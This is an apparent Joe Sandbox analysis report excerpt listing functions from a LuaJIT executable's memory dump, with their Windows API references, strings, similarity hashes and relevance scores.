Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF677E4B7F4
LoadLibraryExA.KERNELBASE ref: 00007FF677E4B84B
SetLastError.KERNEL32 ref: 00007FF677E4B85C

Strings

%s.dll, xrefs: 00007FF677E4B82F
cannot load module '%s': %s, xrefs: 00007FF677E4B88E

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLast$LibraryLoad
String ID: %s.dll$cannot load module '%s': %s
API String ID: 1136134869-4289185444
Opcode ID: c844f6a29efa947424cb09f57144a9e1a9ee2c23f4a27d5807583d39c1045496
Instruction ID: 0a6b8b8247d53a43ecdd5a61d1be488d29738782c53f2b8ec7e89dccda141c79
Opcode Fuzzy Hash: c844f6a29efa947424cb09f57144a9e1a9ee2c23f4a27d5807583d39c1045496
Instruction Fuzzy Hash: 24110526A29B9681E6249F62B84017D77B0EB89BD4F184135EF9D47BC5CE3DE441C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E0DCB0 Relevance: 7.7, APIs: 6, Instructions: 155
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF677E0DCFE
VirtualAlloc.KERNELBASE ref: 00007FF677E0DD16
SetLastError.KERNEL32 ref: 00007FF677E0DD21
GetLastError.KERNEL32 ref: 00007FF677E0DD94
VirtualAlloc.KERNELBASE ref: 00007FF677E0DDAD
SetLastError.KERNEL32 ref: 00007FF677E0DDB8

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLast$AllocVirtual
String ID:
API String ID: 1225938287-0
Opcode ID: 2f2143bb498941bec75cced9dcacd0c17fdc8fa6ec24fcee7208aa3e6033dbcc
Instruction ID: 4c19867ea308dd2b115becb3a055da4b38dc510fe709e77b88d5ab209999d570
Opcode Fuzzy Hash: 2f2143bb498941bec75cced9dcacd0c17fdc8fa6ec24fcee7208aa3e6033dbcc
Instruction Fuzzy Hash: 52519F73B25B4182EA28CB15E454379B7A1FB44B94F684A35CEAE87790EF3CE452C304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E0BE10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExA.KERNELBASE(?,?,?,00007FF677DFAA0C,?,?,?,?,?,?,?,?,?,00007FF677E00C10), ref: 00007FF677E0BE31
GetProcAddressForCaller.KERNELBASE(?,?,?,00007FF677DFAA0C,?,?,?,?,?,?,?,?,?,00007FF677E00C10), ref: 00007FF677E0BE4A

Strings

SystemFunction036, xrefs: 00007FF677E0BE40
advapi32.dll, xrefs: 00007FF677E0BE28

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: AddressCallerLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 4215043672-1354007664
Opcode ID: cebfdd190c46d91446e68554ad3b86c01d433f54c184786dfb086cdbc5a6554b
Instruction ID: c8c590058aae08f8e1252db1c90ab942a3f4105b7e40da1365465164b85cae30
Opcode Fuzzy Hash: cebfdd190c46d91446e68554ad3b86c01d433f54c184786dfb086cdbc5a6554b
Instruction Fuzzy Hash: C511E667B25B0A81FF158B25E89533523A5AF6AB44F580834CE5DDA394EE7CE892C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E89F90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF677E89FC9
LCMapStringEx.KERNELBASE ref: 00007FF677E8A01D
LCMapStringW.KERNEL32 ref: 00007FF677E8A051

Strings

LCMapStringEx, xrefs: 00007FF677E89FAC, 00007FF677E89FBD

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: String$try_get_function
String ID: LCMapStringEx
API String ID: 1203122356-3893581201
Opcode ID: 2b6ef0dcb588f211d0c714de11c13471664f00ff4b6a7aa5471f9e10c7e91108
Instruction ID: f8a94526a6c212b4c80ea0f559bd8a59bdb116fdccf3d372a2d0895431fe8782
Opcode Fuzzy Hash: 2b6ef0dcb588f211d0c714de11c13471664f00ff4b6a7aa5471f9e10c7e91108
Instruction Fuzzy Hash: 1F113636A18B8186D7A0CB16B4802AAB7A0FB88B94F144136EE8D83B59CF3CD4408B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E2D070 Relevance: 6.1, APIs: 4, Instructions: 80
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FF677E2D0AC
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,00007FF677E3C1D5,?,?,?,?,00007FF677E40639), ref: 00007FF677E2D0E3
VirtualProtect.KERNEL32 ref: 00007FF677E2D131
VirtualProtect.KERNEL32(?,?,?,?,?,?,?,00007FF677E3C1D5,?,?,?,?,00007FF677E40639), ref: 00007FF677E2D176

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: fa44b1b3b309ba523a39dd5dae24c0e1ac7f96c1a153774b8ae88088be8c7adc
Instruction ID: d9de74d7c7d39c48ada209481fc025cd9823178f26e6921e31c0f89e1d84b422
Opcode Fuzzy Hash: fa44b1b3b309ba523a39dd5dae24c0e1ac7f96c1a153774b8ae88088be8c7adc
Instruction Fuzzy Hash: 4E216D63B2998781EB54CF26E544BBE63A0EB44B88F584032DF0D87A94DF3DD4A5C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E0E210 Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF677E0E240
VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF677E0E25E
VirtualFree.KERNELBASE ref: 00007FF677E0E293
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF677E0E2AB

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLastVirtual$FreeQuery
String ID:
API String ID: 2187276999-0
Opcode ID: a284c8eb4bfbe97b37498066048d2db83e0e4d00ca9cadab829bf9187241a676
Instruction ID: 94738463bc626b0da20860f878a9ce9dd0665c3741ac88a28e7ec1ba473dde04
Opcode Fuzzy Hash: a284c8eb4bfbe97b37498066048d2db83e0e4d00ca9cadab829bf9187241a676
Instruction Fuzzy Hash: B6114533A39B8582EA61AF21B45022973B4FB84BC0F284139DE8D53B98DF3CE455CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E0D950 Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF677E0D965
VirtualQuery.KERNEL32 ref: 00007FF677E0D980
VirtualFree.KERNELBASE ref: 00007FF677E0D9B5
SetLastError.KERNEL32 ref: 00007FF677E0D9CD

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLastVirtual$FreeQuery
String ID:
API String ID: 2187276999-0
Opcode ID: 839317e8228041fa2e1f2648b85889a3486948da1cdd9c0f93754aaadfb7b849
Instruction ID: 461c3752883855357eca364b45d1c3f4ac6ac9a73b8b0519c76c40501a9837c2
Opcode Fuzzy Hash: 839317e8228041fa2e1f2648b85889a3486948da1cdd9c0f93754aaadfb7b849
Instruction Fuzzy Hash: 59115833B38A8141EBA0CB15B44022A63B5FB49BD8F594535EE9D8269CDF7CD590C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E0E0E0 Relevance: 3.8, APIs: 3, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00007FF677DFAA2E,?,?,?,?,?,?,?,?,?,00007FF677E00C10), ref: 00007FF677E0E0EA
VirtualAlloc.KERNELBASE(?,?,?,00007FF677DFAA2E,?,?,?,?,?,?,?,?,?,00007FF677E00C10), ref: 00007FF677E0E103
SetLastError.KERNEL32(?,?,?,00007FF677DFAA2E,?,?,?,?,?,?,?,?,?,00007FF677E00C10), ref: 00007FF677E0E10E

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLast$AllocVirtual
String ID:
API String ID: 1225938287-0
Opcode ID: 285b33b9818949d3c29423ddccaaa5e87681a57d664be0d455f9b4024412526f
Instruction ID: ec6726b2f1c2a79c8876991449fada2d8258060be86327c3fc74d0e24455802e
Opcode Fuzzy Hash: 285b33b9818949d3c29423ddccaaa5e87681a57d664be0d455f9b4024412526f
Instruction Fuzzy Hash: 07219F73B24A8086E7148B21E9843AD72A1EB45BF8F684734DE7D4BAD9CF3CD5558340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E968A0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCPInfo.KERNEL32 ref: 00007FF677E968E2

Strings

, xrefs: 00007FF677E96925

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: d26b197fc85d6378a6b55222ed312ac47425772993a6907c9e646548b17fbfe6
Instruction ID: 9831d33031d36ff52a755495528fe93fc808de52d4011a4034ce9236bcc85a2b
Opcode Fuzzy Hash: d26b197fc85d6378a6b55222ed312ac47425772993a6907c9e646548b17fbfe6
Instruction Fuzzy Hash: B551B133A2C6C18AE7218F28D0443AE7BA0F759B48F544136EA8D87A99CF7CD545CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E2CEF0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FF677E2CF22

Strings

, xrefs: 00007FF677E2CF2C

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-3916222277
Opcode ID: 01fbac281c50a49a96e9d0cb43a1ec749b8e80516e3f3a373b503d2e74f4f941
Instruction ID: dd743018570979338304162cd95e52b6a4148b98c71ef1bb9e7689a902b8c815
Opcode Fuzzy Hash: 01fbac281c50a49a96e9d0cb43a1ec749b8e80516e3f3a373b503d2e74f4f941
Instruction Fuzzy Hash: F2E0ED62A2AA8781FB54DB65D4587E933A0EB54B4CF281036DE194B251DF3DC0978700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E96D78 Relevance: 3.2, APIs: 2, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF677E96790: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF677E96AB4,?,?,?,?,00000000,COMSPEC,?,00007FF677E96D4E), ref: 00007FF677E967BA

IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF677E96B67,?,?,?,?,00000000,COMSPEC,?,00007FF677E96D4E), ref: 00007FF677E96DE3
GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,00007FF677E96B67,?,?,?,?,00000000,COMSPEC,?,00007FF677E96D4E), ref: 00007FF677E96E2F

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: b30f117d48d73a8056a61fa276d23b3d8ed677ba98b71f99d919e611270c9a61
Instruction ID: 8727495b8032ba6823843b8741ca9cd246b5e60131be7082bbc39dbd9b9bc906
Opcode Fuzzy Hash: b30f117d48d73a8056a61fa276d23b3d8ed677ba98b71f99d919e611270c9a61
Instruction Fuzzy Hash: A581E5A3A2C28286FB758F29D4401797BA1EB60748F444037DE8EC7690DE3DF555CB02

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E7B600 Relevance: 3.2, APIs: 2, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E7B63C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E7B739

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 12f44f115ac616be0532b19613da48ae23ec1e31c1aa57495a1ed08c34be612c
Instruction ID: 4bf3d8fd617dde3e5827c6291ce909f8b1d26de5406a66f5e8816b790ecd5c7c
Opcode Fuzzy Hash: 12f44f115ac616be0532b19613da48ae23ec1e31c1aa57495a1ed08c34be612c
Instruction Fuzzy Hash: 2D512A23B2968546FA289F75940067A6691BF56BA4F048334DEED9B7C7CF3CE4418680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E970C0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF677E8649B,?,?,COMSPEC,00007FF677E8698E), ref: 00007FF677E970D9
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00000001,00007FF677E8649B,?,?,COMSPEC,00007FF677E8698E), ref: 00007FF677E9719D

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 5a2da515c838386f7811d03cfc91fe6954a5dddc094c7015ab0f293a68a93eff
Instruction ID: 9a3387deb6c17eb4207af69d5924beb68c4af8fadecb3145fb0f97147229211c
Opcode Fuzzy Hash: 5a2da515c838386f7811d03cfc91fe6954a5dddc094c7015ab0f293a68a93eff
Instruction Fuzzy Hash: D821A733F2879181E6249F12680006AA6A5FF54BD0F484134DE8EA3BD5DF3CE4568701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8D978 Relevance: 3.1, APIs: 2, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF677E8D8AB,?,?,00000000,00007FF677E8D953,?,?,?,?,?,?,00007FF677E7B44A), ref: 00007FF677E8D9DE
GetLastError.KERNEL32(?,?,?,00007FF677E8D8AB,?,?,00000000,00007FF677E8D953,?,?,?,?,?,?,00007FF677E7B44A), ref: 00007FF677E8D9E8

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 3a14b92c9bbadddff11f5306f7ca1229d44cf6feb5347e96e6aaedb0fa6da2c0
Instruction ID: 1cb8ea6f19488011406e30116102fd5b08bb0b1b176d036f7ac3a51ca9890fff
Opcode Fuzzy Hash: 3a14b92c9bbadddff11f5306f7ca1229d44cf6feb5347e96e6aaedb0fa6da2c0
Instruction Fuzzy Hash: A811C423F3C64241FFA09769A4903BC12926F987A4F546339DE2EC73C2DEACA4648301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E4B8A0 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF677E4B8DB
FreeLibrary.KERNELBASE ref: 00007FF677E4B909

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b5ffc7456c5bc9b3dafa6904a3a06c31e735427cff01c1fb9606859edb2597bb
Instruction ID: befa41be0a4b085f755d5ef22f2c199b07a9a1df61f3cf028b70395899575f10
Opcode Fuzzy Hash: b5ffc7456c5bc9b3dafa6904a3a06c31e735427cff01c1fb9606859edb2597bb
Instruction Fuzzy Hash: 6C015233E28A8481EA50CF55F440139B778FF95BA4B555221EEA983A94CF3CD451C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677DFE310 Relevance: 2.6, APIs: 2, Instructions: 129COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF677DFE341
SetLastError.KERNEL32 ref: 00007FF677DFE4DB

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 2bbd389214606fdf99eea415a151996156015ab3f66345b9d67328ffe386fc39
Instruction ID: a0120686047229b2ccd98ccbd4712eb438f1b724a19fb8456a49bf2201d34b03
Opcode Fuzzy Hash: 2bbd389214606fdf99eea415a151996156015ab3f66345b9d67328ffe386fc39
Instruction Fuzzy Hash: E6518B23A28A8585EB209B29D44437D63A5FB89BB8F154336CE7D837E5DE7CD845CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E2D210 Relevance: 2.6, APIs: 2, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,?,?,?,00007FF677E40004), ref: 00007FF677E2D27A
VirtualFree.KERNEL32(?,?,?,?,?,?,?,00007FF677E40004), ref: 00007FF677E2D2B4

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: ec8545554d4a6bf9a39bf5eda0942499c7f15918e73b7330461e443d0cd978bd
Instruction ID: 87c67041c29f7e37f58d8e910c69d6ee37b5a45c31bd3da59eed6a39eab2d262
Opcode Fuzzy Hash: ec8545554d4a6bf9a39bf5eda0942499c7f15918e73b7330461e443d0cd978bd
Instruction Fuzzy Hash: B3317023B28E8686EA18CF21E5543BA7760FB44BA8F584631DF6E47794DF3CD1528304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8EB78 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E8EBA0

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 76a47aa2283c516f8cec9494bd07b991198a22d56607e1e87e8a5922a60b50a3
Instruction ID: 52f08d29817a4883d694581f33cce12abde3d3c73006b7d451478214e187b275
Opcode Fuzzy Hash: 76a47aa2283c516f8cec9494bd07b991198a22d56607e1e87e8a5922a60b50a3
